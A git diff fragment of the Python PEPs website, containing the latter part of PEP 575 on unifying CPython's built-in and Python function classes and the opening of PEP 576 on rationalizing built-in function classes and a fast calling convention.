+    PyObject *m_self;         /* __self__: anything, can be NULL; readonly */
+    PyObject *m_module;       /* __module__: anything (typically str) */
+    PyObject *m_parent;       /* __parent__: anything, can be NULL; readonly */
+    PyObject *m_weakreflist;  /* List of weak references */
+} PyBaseFunctionObject;
+
+typedef struct {
+    const char *ml_name;   /* The name of the built-in function/method */
+    PyCFunction ml_meth;   /* The C function that implements it */
+    int ml_flags;          /* Combination of METH_xxx flags, which mostly
+                              describe the args expected by the C func */
+} PyCFunctionDef;
+
+
+

Subclasses may extend PyCFunctionDef with extra fields.

+

The Python attribute __self__ returns m_self, +except if METH_STATIC is set. +In that case or if m_self is NULL, +then there is no __self__ attribute at all. +For that reason, we write either m_self or __self__ in this PEP +with slightly different meanings.

+
+
+

cfunction

+

This is the new version of the old builtin_function_or_method class. +The name cfunction was chosen to avoid confusion with “built-in” +in the sense of “something in the builtins module”. +It also fits better with the C API which use the PyCFunction prefix.

+

The class cfunction is a copy of base_function, with the following differences:

+
    +
  1. m_ml points to a PyMethodDef structure, +extending PyCFunctionDef with an additional ml_doc +field to implement __doc__ and __text_signature__ +as read-only attributes:
    typedef struct {
    +    const char *ml_name;
    +    PyCFunction ml_meth;
    +    int ml_flags;
    +    const char *ml_doc;
    +} PyMethodDef;
    +
    +
    +

    Note that PyMethodDef is part of the Python Stable ABI +and it is used by practically all extension modules, +so we absolutely cannot change this structure.

    +
  2. +
  3. Argument Clinic is supported.
  4. +
  5. __self__ always exists. In the cases where base_function.__self__ +would raise AttributeError, instead None is returned.
  6. +
+

The type object is PyTypeObject PyCFunction_Type +and we define PyCFunctionObject as alias of PyBaseFunctionObject +(except for the type of m_ml).

+
+
+

defined_function

+

The class defined_function is an abstract base class meant +to indicate that the function has introspection support. +Instances of defined_function are required to support all attributes +that Python functions have, namely +__code__, __globals__, __doc__, +__defaults__, __kwdefaults__, __closure__ and __annotations__. +There is also a __dict__ to support attributes added by the user.

+

None of these is required to be meaningful. +In particular, __code__ may not be a working code object, +possibly only a few fields may be filled in. +This PEP does not dictate how the various attributes are implemented. +They may be simple struct members or more complicated descriptors. +Only read-only support is required, none of the attributes is required to be writable.

+

The class defined_function is mainly meant for auto-generated C code, +for example produced by Cython [1]. +There is no API to create instances of it.

+

The C structure is the following:

+
PyTypeObject PyDefinedFunction_Type;
+
+typedef struct {
+    PyBaseFunctionObject base;
+    PyObject *func_dict;        /* __dict__: dict or NULL */
+} PyDefinedFunctionObject;
+
+
+

TODO: maybe find a better name for defined_function. +Other proposals: inspect_function (anything that satisfies inspect.isfunction), +builtout_function (a function that is better built out; pun on builtin), +generic_function (original proposal but conflicts with functools.singledispatch generic functions), +user_function (defined by the user as opposed to CPython).

+
+
+

function

+

This is the class meant for functions implemented in Python. +Unlike the other function types, +instances of function can be created from Python code. +This is not changed, so we do not describe the details in this PEP.

+

The layout of the C structure is the following:

+
PyTypeObject PyFunction_Type;
+
+typedef struct {
+    PyBaseFunctionObject base;
+    PyObject *func_dict;        /* __dict__: dict or NULL */
+    PyObject *func_code;        /* __code__: code */
+    PyObject *func_globals;     /* __globals__: dict; readonly */
+    PyObject *func_name;        /* __name__: string */
+    PyObject *func_qualname;    /* __qualname__: string */
+    PyObject *func_doc;         /* __doc__: can be anything or NULL */
+    PyObject *func_defaults;    /* __defaults__: tuple or NULL */
+    PyObject *func_kwdefaults;  /* __kwdefaults__: dict or NULL */
+    PyObject *func_closure;     /* __closure__: tuple of cell objects or NULL; readonly */
+    PyObject *func_annotations; /* __annotations__: dict or NULL */
+    PyCFunctionDef _ml;         /* Storage for base.m_ml */
+} PyFunctionObject;
+
+
+

The descriptor __name__ returns func_name. +When setting __name__, also base.m_ml->ml_name is updated +with the UTF-8 encoded name.

+

The _ml field reserves space to be used by base.m_ml.

+

A base_function instance must have the flag METH_PYTHON set +if and only if it is an instance of function.

+

When constructing an instance of function from code and globals, +an instance is created with base.m_ml = &_ml, +base.m_self = NULL.

+

To make subclassing easier, we also add a copy constructor: +if f is an instance of function, then types.FunctionType(f) copies f. +This conveniently allows using a custom function type as decorator:

+
>>> from types import FunctionType
+>>> class CustomFunction(FunctionType):
+...     pass
+>>> @CustomFunction
+... def f(x):
+...     return x
+>>> type(f)
+<class '__main__.CustomFunction'>
+
+
+

This also removes many use cases of functools.wraps: +wrappers can be replaced by subclasses of function.

+
+
+

bound_method

+

The class bound_method is used for all bound methods, +regardless of the class of the underlying function. +It adds one new attribute on top of base_function: +__func__ points to that function.

+

bound_method replaces the old method class +which was used only for Python functions bound as method.

+

There is a complication because we want to allow +constructing a method from an arbitrary callable. +This may be an already-bound method or simply not an instance of base_function. +Therefore, in practice there are two kinds of methods:

+
    +
  • For arbitrary callables, we use a single fixed PyCFunctionDef +structure with the METH_PASS_FUNCTION flag set.
  • +
  • For methods which bind instances of base_function +(more precisely, which have the Py_TPFLAGS_BASEFUNCTION flag set) +that have self slicing, +we instead use the PyCFunctionDef from the original function. +This way, we don’t lose any performance when calling bound methods. +In this case, the __func__ attribute is only used to implement +various attributes but not for calling the method.
  • +
+

When constructing a new method from a base_function, +we check that the self object is an instance of __objclass__ +(if a class was specified as parent) and raise a TypeError otherwise.

+

The C structure is:

+
PyTypeObject PyMethod_Type;
+
+typedef struct {
+    PyBaseFunctionObject base;
+    PyObject *im_func;  /* __func__: function implementing the method; readonly */
+} PyMethodObject;
+
+
+
+
+
+

Calling base_function instances

+

We specify the implementation of __call__ for instances of base_function.

+
+

Checking __objclass__

+

First of all, a type check is done if the __parent__ of the function +is a class +(recall that __objclass__ then becomes an alias of __parent__): +if m_self is NULL (this is the case for unbound methods of extension types), +then the function must be called with at least one positional argument +and the first (typically called self) must be an instance of __objclass__. +If not, a TypeError is raised.

+

Note that bound methods have m_self != NULL, so the __objclass__ +is not checked. +Instead, the __objclass__ check is done when constructing the method.

+
+
+

Flags

+

For convenience, we define a new constant: +METH_CALLFLAGS combines all flags from PyCFunctionDef.ml_flags +which specify the signature of the C function to be called. +It is equal to

+
METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_PASS_FUNCTION
+
+
+

Exactly one of the first four flags above must be set +and only METH_VARARGS and METH_FASTCALL may be combined with METH_KEYWORDS. +Violating these rules is undefined behaviour.

+

There are one new flags which affects calling functions, +namely METH_PASS_FUNCTION and METH_CALL_UNBOUND. +Some flags are already documented in [5]. +We explain the others below.

+
+
+

Self slicing

+

If the function has m_self == NULL and the flag METH_CALL_UNBOUND +is not set, then the first positional argument (if any) +is removed from *args and instead passed as first argument to the C function. +Effectively, the first positional argument is treated as __self__. +This is meant to support unbound methods +such that the C function does not see the difference +between bound and unbound method calls. +This does not affect keyword arguments in any way.

+

This process is called self slicing and a function is said to +have self slicing if m_self == NULL and METH_CALL_UNBOUND is not set.

+

Note that a METH_NOARGS function which has self slicing +effectively has one argument, namely self. +Analogously, a METH_O function with self slicing has two arguments.

+
+
+

METH_PASS_FUNCTION

+

If this flag is set, then the C function is called with an +additional first argument, namely the function itself +(the base_function instance). +As special case, if the function is a bound_method, +then the underlying function of the method is passed +(but not recursively: if a bound_method wraps a bound_method, +then __func__ is only applied once).

+

For example, an ordinary METH_VARARGS function has signature +(PyObject *self, PyObject *args). +With METH_VARARGS | METH_PASS_FUNCTION, this becomes +(PyObject *func, PyObject *self, PyObject *args).

+
+
+

METH_FASTCALL

+

This is an existing but undocumented flag. +We suggest to officially support and document it.

+

If the flag METH_FASTCALL is set without METH_KEYWORDS, +then the ml_meth field is of type PyCFunctionFast +which takes the arguments (PyObject *self, PyObject *const *args, Py_ssize_t nargs). +Such a function takes only positional arguments and they are passed as plain C array +args of length nargs.

+

If the flags METH_FASTCALL | METH_KEYWORDS are set, +then the ml_meth field is of type PyCFunctionFastKeywords +which takes the arguments (PyObject *self, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames). +The positional arguments are passed as C array args of length nargs. +The values of the keyword arguments follow in that array, +starting at position nargs. +The keys (names) of the keyword arguments are passed as a tuple in kwnames. +As an example, assume that 3 positional and 2 keyword arguments are given. +Then args is an array of length 3 + 2 = 5, nargs equals 3 and kwnames is a 2-tuple.

+
+
+
+

Automatic creation of built-in functions

+

Python automatically generates instances of cfunction +for extension types (using the PyTypeObject.tp_methods field) and modules +(using the PyModuleDef.m_methods field). +The arrays PyTypeObject.tp_methods and PyModuleDef.m_methods +must be arrays of PyMethodDef structures.

+
+

Unbound methods of extension types

+

The type of unbound methods changes from method_descriptor +to cfunction. +The object which appears as unbound method is the same object which +appears in the class __dict__. +Python automatically sets the __parent__ attribute to the defining class.

+
+
+

Built-in functions of a module

+

For the case of functions of a module, +__parent__ will be set to the module. +Unless the flag METH_BINDING is given, also __self__ +will be set to the module (for backwards compatibility).

+

An important consequence is that such functions by default +do not become methods when used as attribute +(base_function.__get__ only does that if m_self was NULL). +One could consider this a bug, but this was done for backwards compatibility reasons: +in an initial post on python-ideas [6] the consensus was to keep this +misfeature of built-in functions.

+

However, to allow this anyway for specific or newly implemented +built-in functions, the METH_BINDING flag prevents setting __self__.

+
+
+
+

Further changes

+
+

New type flag

+

A new PyTypeObject flag (for tp_flags) is added: +Py_TPFLAGS_BASEFUNCTION to indicate that instances of this type are +functions which can be called and bound as method like a base_function.

+

This is different from flags like Py_TPFLAGS_LIST_SUBCLASS +because it indicates more than just a subclass: +it also indicates a default implementation of __call__ and __get__. +In particular, such subclasses of base_function +must follow the implementation from the section Calling base_function instances.

+

This flag is automatically set for extension types which +inherit the tp_call and tp_descr_get implementation from base_function. +Extension types can explicitly specify it if they +override __call__ or __get__ in a compatible way. +The flag Py_TPFLAGS_BASEFUNCTION must never be set for a heap type +because that would not be safe (heap types can be changed dynamically).

+
+
+

C API functions

+

We list some relevant Python/C API macros and functions. +Some of these are existing (possibly changed) functions, some are new:

+
    +
  • int PyBaseFunction_CheckFast(PyObject *op): return true if op +is an instance of a class with the Py_TPFLAGS_BASEFUNCTION set. +This is the function that you need to use to determine +whether it is meaningful to access the base_function internals.
  • +
  • int PyBaseFunction_Check(PyObject *op): return true if op +is an instance of base_function.
  • +
  • PyObject *PyBaseFunction_New(PyTypeObject *cls, PyCFunctionDef *ml, PyObject *self, PyObject *module, PyObject *parent): +create a new instance of cls (which must be a subclass of base_function) +from the given data.
  • +
  • int PyCFunction_Check(PyObject *op): return true if op +is an instance of cfunction.
  • +
  • int PyCFunction_NewEx(PyMethodDef* ml, PyObject *self, PyObject* module): +create a new instance of cfunction. +As special case, if self is NULL, +then set self = Py_None instead (for backwards compatibility). +If self is a module, then __parent__ is set to self. +Otherwise, __parent__ is NULL.
  • +
  • For many existing PyCFunction_... and PyMethod_ functions, +we define a new function PyBaseFunction_... +acting on base_function instances. +The old functions are kept as aliases of the new functions.
  • +
  • int PyFunction_Check(PyObject *op): return true if op +is an instance of base_function with the METH_PYTHON flag set +(this is equivalent to checking whether op is an instance of function).
  • +
  • int PyFunction_CheckFast(PyObject *op): equivalent to +PyFunction_Check(op) && PyBaseFunction_CheckFast(op).
  • +
  • int PyFunction_CheckExact(PyObject *op): return true +if the type of op is function.
  • +
  • PyObject *PyFunction_NewPython(PyTypeObject *cls, PyObject *code, PyObject *globals, PyObject *name, PyObject *qualname): +create a new instance of cls (which must be a subclass of function) +from the given data.
  • +
  • PyObject *PyFunction_New(PyObject *code, PyObject *globals): +create a new instance of function.
  • +
  • PyObject *PyFunction_NewWithQualName(PyObject *code, PyObject *globals, PyObject *qualname): +create a new instance of function.
  • +
  • PyObject *PyFunction_Copy(PyTypeObject *cls, PyObject *func): +create a new instance of cls (which must be a subclass of function) +by copying a given function.
  • +
+
+
+

Changes to the types module

+

Two types are added: types.BaseFunctionType corresponding to +base_function and types.DefinedFunctionType corresponding to +defined_function.

+

Apart from that, no changes to the types module are made. +In particular, types.FunctionType refers to function. +However, the actual types will change: +in particular, types.BuiltinFunctionType will no longer be the same +as types.BuiltinMethodType.

+
+
+

Changes to the inspect module

+

The new function inspect.isbasefunction checks for an instance of base_function.

+

inspect.isfunction checks for an instance of defined_function.

+

inspect.isbuiltin checks for an instance of cfunction.

+

inspect.isroutine checks isbasefunction or ismethoddescriptor.

+

NOTE: bpo-33261 [3] should be fixed first.

+
+
+

Profiling

+

Currently, sys.setprofile supports c_call, c_return and c_exception +events for built-in functions. +These events are generated when calling or returning from a built-in function. +By contrast, the call and return events are generated by the function itself. +So nothing needs to change for the call and return events.

+

Since we no longer make a difference between C functions and Python functions, +we need to prevent the c_* events for Python functions. +This is done by not generating those events if the +METH_PYTHON flag in ml_flags is set.

+
+
+
+

Non-CPython implementations

+

Most of this PEP is only relevant to CPython. +For other implementations of Python, +the two changes that are required are the base_function base class +and the fact that function can be subclassed. +The classes cfunction and defined_function are not required.

+

We require base_function for consistency but we put no requirements on it: +it is acceptable if this is just a copy of object. +Support for the new __parent__ (and __objclass__) attribute is not required. +If there is no defined_function class, +then types.DefinedFunctionType should be an alias of types.FunctionType.

+
+
+

Rationale

+
+

Why not simply change existing classes?

+

One could try to solve the problem by keeping the existing classes +without introducing a new base_function class.

+

That might look like a simpler solution but it is not: +it would require introspection support for 3 distinct classes: +function, builtin_function_or_method and method_descriptor. +For the latter two classes, “introspection support” would mean +at a minimum allowing subclassing. +But we don’t want to lose performance, so we want fast subclass checks. +This would require two new flags in tp_flags. +And we want subclasses to allow __get__ for built-in functions, +so we should implement the LOAD_METHOD opcode for built-in functions too. +More generally, a lot of functionality would need to be duplicated +and the end result would be far more complex code.

+

It is also not clear how the introspection of built-in function subclasses +would interact with __text_signature__. +Having two independent kinds of inspect.signature support on the same +class sounds like asking for problems.

+

And this would not fix some of the other differences between built-in functions +and Python functions that were mentioned in the motivation.

+
+
+

Why __text_signature__ is not a solution

+

Built-in functions have an attribute __text_signature__, +which gives the signature of the function as plain text. +The default values are evaluated by ast.literal_eval. +Because of this, it supports only a small number of standard Python classes +and not arbitrary Python objects.

+

And even if __text_signature__ would allow arbitrary signatures somehow, +that is only one piece of introspection: +it does not help with inspect.getsourcefile for example.

+
+
+

defined_function versus function

+

In many places, a decision needs to be made whether the old function class +should be replaced by defined_function or the new function class. +This is done by thinking of the most likely use case:

+
    +
  1. types.FunctionType refers to function because that +type might be used to construct instances using types.FunctionType(...).
  2. +
  3. inspect.isfunction() refers to defined_function +because this is the class where introspection is supported.
  4. +
  5. The C API functions must refer to function because +we do not specify how the various attributes of defined_function +are implemented. +We expect that this is not a problem since there is typically no +reason for introspection to be done by C extensions.
  6. +
+
+
+

Scope of this PEP: which classes are involved?

+

The main motivation of this PEP is fixing function classes, +so we certainly want to unify the existing classes +builtin_function_or_method and function.

+

Since built-in functions and methods have the same class, +it seems natural to include bound methods too. +And since there are no “unbound methods” for Python functions, +it makes sense to get rid of unbound methods for extension types.

+

For now, no changes are made to the classes staticmethod, +classmethod and classmethod_descriptor. +It would certainly make sense to put these in the base_function +class hierarchy and unify classmethod and classmethod_descriptor. +However, this PEP is already big enough +and this is left as a possible future improvement.

+

Slot wrappers for extension types like __init__ or __eq__ +are quite different from normal methods. +They are also typically not called directly because you would normally +write foo[i] instead of foo.__getitem__(i). +So these are left outside the scope of this PEP.

+

Python also has an instancemethod class, +which seems to be a relic from Python 2, +where it was used for bound and unbound methods. +It is not clear whether there is still a use case for it. +In any case, there is no reason to deal with it in this PEP.

+

TODO: should instancemethod be deprecated? +It doesn’t seem used at all within CPython 3.7, +but maybe external packages use it?

+
+
+

Not treating METH_STATIC and METH_CLASS

+

Almost nothing in this PEP refers to the flags METH_STATIC and METH_CLASS. +These flags are checked only by the automatic creation of built-in functions. +When a staticmethod, classmethod or classmethod_descriptor +is bound (i.e. __get__ is called), +a base_function instance is created with m_self != NULL. +For a classmethod, this is obvious since m_self +is the class that the method is bound to. +For a staticmethod, one can take an arbitrary Python object for m_self. +For backwards compatibility, we choose m_self = __parent__ for static methods +of extension types.

+
+
+

__self__ in base_function

+

It may look strange at first sight to add the __self__ slot +in base_function as opposed to bound_method. +We took this idea from the existing builtin_function_or_method class. +It allows us to have a single general implementation of __call__ and __get__ +for the various function classes discussed in this PEP.

+

It also makes it easy to support existing built-in functions +which set __self__ to the module (for example, sys.exit.__self__ is sys).

+
+
+

Two implementations of __doc__

+

base_function does not support function docstrings. +Instead, the classes cfunction and function +each have their own way of dealing with docstrings +(and bound_method just takes the __doc__ from the wrapped function).

+

For cfunction, the docstring is stored (together with the text signature) +as C string in the read-only ml_doc field of a PyMethodDef. +For function, the docstring is stored as a writable Python object +and it does not actually need to be a string. +It looks hard to unify these two very different ways of dealing with __doc__. +For backwards compatibility, we keep the existing implementations.

+

For defined_function, we require __doc__ to be implemented +but we do not specify how. A subclass can implement __doc__ the +same way as cfunction or using a struct member or some other way.

+
+
+

Subclassing

+

We disallow subclassing of cfunction and bound_method +to enable fast type checks for PyCFunction_Check and PyMethod_Check.

+

We allow subclassing of the other classes because there is no reason to disallow it. +For Python modules, the only relevant class to subclass is +function because the others cannot be instantiated anyway.

+
+
+

Replacing tp_call: METH_PASS_FUNCTION and METH_CALL_UNBOUND

+

The new flags METH_PASS_FUNCTION and METH_CALL_UNBOUND +are meant to support cases where formerly a custom tp_call was used. +It reduces the number of special fast paths in Python/ceval.c +for calling objects: +instead of treating Python functions, built-in functions and method descriptors +separately, there would only be a single check.

+

The signature of tp_call is essentially the signature +of PyBaseFunctionObject.m_ml.ml_meth with flags +METH_VARARGS | METH_KEYWORDS | METH_PASS_FUNCTION | METH_CALL_UNBOUND +(the only difference is an added self argument). +Therefore, it should be easy to change existing tp_call slots +to use the base_function implementation instead.

+

It also makes sense to use METH_PASS_FUNCTION without METH_CALL_UNBOUND +in cases where the C function simply needs access to additional metadata +from the function, such as the __parent__. +This is for example needed to support PEP 573. +Converting existing methods to use METH_PASS_FUNCTION is trivial: +it only requires adding an extra argument to the C function.

+
+
+
+

Backwards compatibility

+

While designing this PEP, great care was taken to not break +backwards compatibility too much. +Most of the potentially incompatible changes +are changes to CPython implementation details +which are different anyway in other Python interpreters. +In particular, Python code which correctly runs on PyPy +will very likely continue to work with this PEP.

+

The standard classes and functions like +staticmethod, functools.partial or operator.methodcaller +do not need to change at all.

+
+

Changes to types and inspect

+

The proposed changes to types and inspect +are meant to minimize changes in behaviour. +However, it is unavoidable that some things change +and this can cause code which uses types or inspect to break. +In the Python standard library for example, +changes are needed in the doctest module because of this.

+

Also, tools which take various kinds of functions as input will need to deal +with the new function hierarchy and the possibility of custom +function classes.

+
+
+

Python functions

+

For Python functions, essentially nothing changes. +The attributes that existed before still exist and Python functions +can be initialized, called and turned into methods as before.

+

The name function is kept for backwards compatibility. +While it might make sense to change the name to something more +specific like python_function, +that would require a lot of annoying changes in documentation and testsuites.

+
+
+

Built-in functions of a module

+

Also for built-in functions, nothing changes. +We keep the old behaviour that such functions do not bind as methods. +This is a consequence of the fact that __self__ is set to the module.

+
+
+

Built-in bound and unbound methods

+

The types of built-in bound and unbound methods will change. +However, this does not affect calling such methods +because the protocol in base_function.__call__ +(in particular the handling of __objclass__ and self slicing) +was specifically designed to be backwards compatible. +All attributes which existed before (like __objclass__ and __self__) +still exist.

+
+
+

New attributes

+

Some objects get new special double-underscore attributes. +For example, the new attribute __parent__ appears on +all built-in functions and all methods get a __func__ attribute. +The fact that __self__ is now a special read-only attribute +for Python functions caused trouble in [4]. +Generally, we expect that not much will break though.

+
+
+

method_descriptor and PyDescr_NewMethod

+

The class method_descriptor and the constructor PyDescr_NewMethod +should be deprecated. +They are no longer used by CPython itself but are still supported.

+
+
+
+

Two-phase Implementation

+

TODO: this section is optional. +If this PEP is accepted, it should +be decided whether to apply this two-phase implementation or not.

+

As mentioned above, the changes to types and inspect can break some +existing code. +In order to further minimize breakage, this PEP could be implemented +in two phases.

+
+

Phase one: keep existing classes but add base classes

+

Initially, implement the base_function class +and use it as common base class but otherwise keep the existing classes +(but not their implementation).

+

In this proposal, the class hierarchy would become:

+
                      object
+                         |
+                         |
+                  base_function
+                 /       |     \
+                /        |      \
+               /         |       \
+      cfunction          |     defined_function
+       |     |           |         \
+       |     |      bound_method    \
+       |     |                       \
+       |  method_descriptor       function
+       |
+builtin_function_or_method
+
+
+

The leaf classes builtin_function_or_method, method_descriptor, +bound_method and function correspond to the existing classes +(with method renamed to bound_method).

+

Automatically created functions created in modules become instances +of builtin_function_or_method. +Unbound methods of extension types become instances of method_descriptor.

+

The class method_descriptor is a copy of cfunction except +that __get__ returns a builtin_function_or_method instead of a +bound_method.

+

The class builtin_function_or_method has the same C structure as a +bound_method, but it inherits from cfunction. +The __func__ attribute is not mandatory: +it is only defined when binding a method_descriptor.

+

We keep the implementation of the inspect functions as they are. +Because of this and because the existing classes are kept, +backwards compatibility is ensured for code doing type checks.

+

Since showing an actual DeprecationWarning would affect a lot +of correctly-functioning code, +any deprecations would only appear in the documentation. +Another reason is that it is hard to show warnings for calling isinstance(x, t) +(but it could be done using __instancecheck__ hacking) +and impossible for type(x) is t.

+
+
+

Phase two

+

Phase two is what is actually described in the rest of this PEP. +In terms of implementation, +it would be a relatively small change compared to phase one.

+
+
+
+

Reference Implementation

+

Most of this PEP has been implemented for CPython at +https://github.com/jdemeyer/cpython/tree/pep575

+

There are four steps, corresponding to the commits on that branch. +After each step, CPython is in a mostly working state.

+
    +
  1. Add the base_function class and make it a subclass for cfunction. +This is by far the biggest step as the complete __call__ protocol +is implemented in this step.
  2. +
  3. Rename method to bound_method and make it a subclass of base_function. +Change unbound methods of extension types to be instances of cfunction +such that bound methods of extension types are also instances of bound_method.
  4. +
  5. Implement defined_function and function.
  6. +
  7. Changes to other parts of Python, such as the standard library and testsuite.
  8. +
+
+
+

Appendix: current situation

+

NOTE: +This section is more useful during the draft period of the PEP, +so feel free to remove this once the PEP has been accepted.

+

For reference, we describe in detail the relevant existing classes in CPython 3.7.

+

Each of the classes involved is an “orphan” class +(no non-trivial subclasses nor superclasses).

+
+

builtin_function_or_method: built-in functions and bound methods

+

These are of type PyCFunction_Type +with structure PyCFunctionObject:

+
typedef struct {
+    PyObject_HEAD
+    PyMethodDef *m_ml; /* Description of the C function to call */
+    PyObject    *m_self; /* Passed as 'self' arg to the C func, can be NULL */
+    PyObject    *m_module; /* The __module__ attribute, can be anything */
+    PyObject    *m_weakreflist; /* List of weak references */
+} PyCFunctionObject;
+
+struct PyMethodDef {
+    const char  *ml_name;   /* The name of the built-in function/method */
+    PyCFunction ml_meth;    /* The C function that implements it */
+    int         ml_flags;   /* Combination of METH_xxx flags, which mostly
+                               describe the args expected by the C func */
+    const char  *ml_doc;    /* The __doc__ attribute, or NULL */
+};
+
+
+

where PyCFunction is a C function pointer (there are various forms of this, the most basic +takes two arguments for self and *args).

+

This class is used both for functions and bound methods: +for a method, the m_self slot points to the object:

+
>>> dict(foo=42).get
+<built-in method get of dict object at 0x...>
+>>> dict(foo=42).get.__self__
+{'foo': 42}
+
+
+

In some cases, a function is considered a “method” of the module defining it:

+
>>> import os
+>>> os.kill
+<built-in function kill>
+>>> os.kill.__self__
+<module 'posix' (built-in)>
+
+
+
+
+

method_descriptor: built-in unbound methods

+

These are of type PyMethodDescr_Type +with structure PyMethodDescrObject:

+
typedef struct {
+    PyDescrObject d_common;
+    PyMethodDef *d_method;
+} PyMethodDescrObject;
+
+typedef struct {
+    PyObject_HEAD
+    PyTypeObject *d_type;
+    PyObject *d_name;
+    PyObject *d_qualname;
+} PyDescrObject;
+
+
+
+
+

function: Python functions

+

These are of type PyFunction_Type +with structure PyFunctionObject:

+
typedef struct {
+    PyObject_HEAD
+    PyObject *func_code;        /* A code object, the __code__ attribute */
+    PyObject *func_globals;     /* A dictionary (other mappings won't do) */
+    PyObject *func_defaults;    /* NULL or a tuple */
+    PyObject *func_kwdefaults;  /* NULL or a dict */
+    PyObject *func_closure;     /* NULL or a tuple of cell objects */
+    PyObject *func_doc;         /* The __doc__ attribute, can be anything */
+    PyObject *func_name;        /* The __name__ attribute, a string object */
+    PyObject *func_dict;        /* The __dict__ attribute, a dict or NULL */
+    PyObject *func_weakreflist; /* List of weak references */
+    PyObject *func_module;      /* The __module__ attribute, can be anything */
+    PyObject *func_annotations; /* Annotations, a dict or NULL */
+    PyObject *func_qualname;    /* The qualified name */
+
+    /* Invariant:
+     *     func_closure contains the bindings for func_code->co_freevars, so
+     *     PyTuple_Size(func_closure) == PyCode_GetNumFree(func_code)
+     *     (func_closure may be NULL if PyCode_GetNumFree(func_code) == 0).
+     */
+} PyFunctionObject;
+
+
+

In Python 3, there is no “unbound method” class: +an unbound method is just a plain function.

+
+
+

method: Python bound methods

+

These are of type PyMethod_Type +with structure PyMethodObject:

+
typedef struct {
+    PyObject_HEAD
+    PyObject *im_func;   /* The callable object implementing the method */
+    PyObject *im_self;   /* The instance it is bound to */
+    PyObject *im_weakreflist; /* List of weak references */
+} PyMethodObject;
+
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0575.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0576/index.html b/pep-0576/index.html new file mode 100644 index 00000000000..34ba36b9d9c --- /dev/null +++ b/pep-0576/index.html @@ -0,0 +1,296 @@ + + + + + + + + PEP 576 – Rationalize Built-in function classes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 576 – Rationalize Built-in function classes

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
BDFL-Delegate:
+
Petr Viktorin
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
10-May-2018
+
Python-Version:
+
3.8
+
Post-History:
+
17-May-2018, +23-Jun-2018, +08-Jul-2018, +29-Mar-2019
+
+
+
+
Table of Contents +
+
+

Abstract

+

Expose the “FastcallKeywords” convention used internally by CPython to third-party code, and make the inspect module use duck-typing. +In combination this will allow third-party C extensions and tools like Cython to create objects that use the same calling conventions as built-in and Python functions, thus gaining performance parity with built-in functions like len or print.

+

A small improvement in the performance of existing code is expected.

+
+
+

Motivation

+

Currently third-party module authors face a dilemma when implementing +functions in C. Either they can use one of the pre-existing built-in function +or method classes or implement their own custom class in C. +The first choice causes them to lose the ability to access the internals of the callable object. +The second choice is an additional maintenance burden and, more importantly, +has a significant negative impact on performance.

+

This PEP aims to allow authors of third-party C modules, and tools like to Cython, to utilize the faster calling convention used internally by CPython for built-in functions and methods, and to do so without a loss of capabilities relative to a function implemented in Python.

+
+

Introspection

+

The inspect module will fully support duck-typing when introspecting callables.

+

The inspect.Signature.from_callable() function computes the signature of a callable. If an object has a __signature__ +property, then inspect.Signature.from_callable() simply returns that. To further support duck-typing, if a callable has a __text_signature__ +then the __signature__ will be created from that.

+

This means that 3rd party builtin-functions can implement __text_signature__ if sufficient, +and the more expensive __signature__ if necessary.

+
+
+

Efficient calls to third-party callables

+

Currently the majority of calls are dispatched to functions and method_descriptors in custom code, using the “FastcallKeywords” internal calling convention. This PEP proposes that this calling convention is implemented via a C function pointer. Third-party callables which implement this binary interface will have the potential to be called as fast as a built-in function.

+
+

Continued prohibition of callable classes as base classes

+

Currently any attempt to use function, method or method_descriptor as a base class for a new class will fail with a TypeError. This behaviour is desirable as it prevents errors when a subclass overrides the __call__ method. If callables could be sub-classed then any call to a function or a method_descriptor would need an additional check that the __call__ method had not been overridden. By exposing an additional call mechanism, the potential for errors becomes greater. As a consequence, any third-party class implementing the addition call interface will not be usable as a base class.

+
+
+
+
+

New classes and changes to existing classes

+
+

Python visible changes

+
    +
  1. A new built-in class, builtin_function, will be added.
  2. +
  3. types.BuiltinFunctionType will refer to builtin_function not builtin_function_or_method.
  4. +
  5. Instances of the builtin_function class will retain the __module__ property of builtin_function_or_method and gain the func_module and func_globals properties. The func_module allows access to the module to which the function belongs. Note that this is different from the __module__ property which merely returns the name of the module. The func_globals property is equivalent to func_module.__dict__ and is provided to mimic the Python function property of the same name.
  6. +
  7. When binding a method_descriptor instance to an instance of its owning class, a bound_method will be created instead of a builtin_function_or_method. This means that the method_descriptors now mimic the behaviour of Python functions more closely. In other words, [].append becomes a bound_method instead of a builtin_function_or_method.
  8. +
+
+
+

C API changes

+
    +
  1. A new function PyBuiltinFunction_New(PyMethodDef *ml, PyObject *module) is added to create built-in functions.
  2. +
  3. PyCFunction_NewEx() and PyCFunction_New() are deprecated and will return a PyBuiltinFunction if able, otherwise a builtin_function_or_method.
  4. +
+
+
+
+

Retaining backwards compatibility in the C API and ABI

+

The proposed changes are fully backwards and forwards compatible at both the API and ABI level.

+
+

Internal C changes

+

Two new flags will be allowed for the typeobject.tp_flags field. +These are Py_TPFLAGS_EXTENDED_CALL and Py_TPFLAGS_FUNCTION_DESCRIPTOR

+
+

Py_TPFLAGS_EXTENDED_CALL

+

For any built-in class that sets Py_TPFLAGS_EXTENDED_CALL +The C struct corresponding to this built-in class must begin with the struct PyExtendedCallable which is defined as follows:

+
typedef PyObject *(*extended_call_ptr)(PyObject *callable, PyObject** args,
+                   int positional_argcount, PyTupleObject* kwnames);
+
+typedef struct {
+    PyObject_HEAD
+    extended_call_ptr ext_call;
+} PyExtendedCallable;
+
+
+

Any class that sets the Py_TPFLAGS_EXTENDED_CALL cannot be used as a base class and a TypeError will be raised if any Python code tries to use it a base class.

+
+
+

Py_TPFLAGS_FUNCTION_DESCRIPTOR

+

If this flag is set for a built-in class F, then instances of that class are expected to behave the same as a Python function when used as a class attribute. +Specifically, this mean that the value of c.m where C.m is an instanceof the built-in class F (and c is an instance of C) must be a bound-method binding C.m and c. +Without this flag, it would be impossible for custom callables to behave like Python functions and be efficient as Python or built-in functions.

+
+
+

